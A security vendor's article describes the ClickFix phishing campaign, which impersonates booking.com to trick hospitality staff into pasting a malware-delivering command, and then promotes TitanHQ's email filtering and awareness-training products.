Individuals in the hospitality sector are being targeted in a sophisticated phishing scam that uses the ClickFix phishing technique. The ClickFix campaign has been active since at least December 2024 and is being conducted on targets in North America, Europe, Oceania, South and Southeast Asia.
The phishing emails impersonate booking.com and target staff at hotels, guest houses, and other accommodation providers that are likely to work with booking.com. A wide range of emails have been associated with this ClickFix campaign, including emails that appear to have been sent by prospective guests about the accommodation asking for advice, notifications from booking.com about complaints from guests about previous stays, requesting feedback on the guests’ comments, and security notifications from booking.com about suspicious login attempts.
While the lures are varied, they all use social engineering techniques to trick the recipient into clicking a link, which directs the user to a web page with a fake CAPTCHA overlayed on a visible background that appears to be the Booking.com website. The link may be added to the message body using anchor text to make it appear that the link is legitimate, or in some of the emails, the link is added to a PDF file attachment in an effort to bypass email security solutions.
When the user attempts to complete the CAPTCHA prompt, they are advised of an error and are told they must use a keyboard shortcut (Windows key + R), then CTRL + V to paste a command into the Windows Run window, and press Enter to execute that command. The command copied to the clipboard will download and launch malicious code through mshta.exe, a legitimate Windows process. If the command is executed, it will lead to the delivery of malware such as AsyncRAT, VenomRAT, NetSupport RAT, Danabot, XWorm, and Lumma Stealer. Victims may get a cocktail of malware installed on their device.
The campaign is being run by a threat actor tracked by Microsoft Threat Intelligence as Storm-1865. Storm-1865 is a financially motivated threat actor that primarily engages in payment data theft and fraudulent charges to victims’ accounts. After achieving its aims, the group may sell access to victims’ devices to other threat actors. Previous campaigns have used similar techniques and have involved messages sent through vendor platforms such as travel agencies, e-commerce platforms, and email services such as Gmail and iCloud mail.
The ClickFix technique was first identified in October 2023 and has been adopted by several different threat actors including financially motivated cybercriminal groups and nation state actors from Russia and North Korea. The lures and malware may differ, but all use social engineering to trick the victim into running a command to fix a fictitious technical issue.
Businesses should ensure they have appropriate defenses to block phishing emails, as the ClickFix technique has proven to be highly effective. TitanHQ offers two solutions for blocking phishing attempts – the SpamTitan spam filtering service and the PhishTitan anti-phishing solution for Microsoft 365 users. The engine that powers both of these solutions was rated #1 out of all tested solutions in the Q4, 2024 tests by VirusBulletin, blocking 100% of phishing emails, 100% of malware, and 99.98% of spam emails. In the February 2025 tests, TitanHQ had a perfect score, blocking 100% of malware, phishing, and spam emails with a 0% false positive rate.
SpamTitan incorporates email sandboxing for behavioral analysis of emails and machine-learning algorithms to identify suspicious emails, ensuring an incredibly high detection rate. PhishTitan adds an additional layer of protection for Microsoft 365 accounts, augmenting Microsoft’s protections to identify and block the threats that Microsoft misses. Businesses should also ensure they provide security awareness training to the workforce and conduct phishing simulations of the ClickFix phishing technique. TitanHQ can help in this area with the SafeTitan security awareness training and phishing simulation platform. Call TitanHQ today for more information on phishing defense, or take advantage of the free trial of all of these solutions.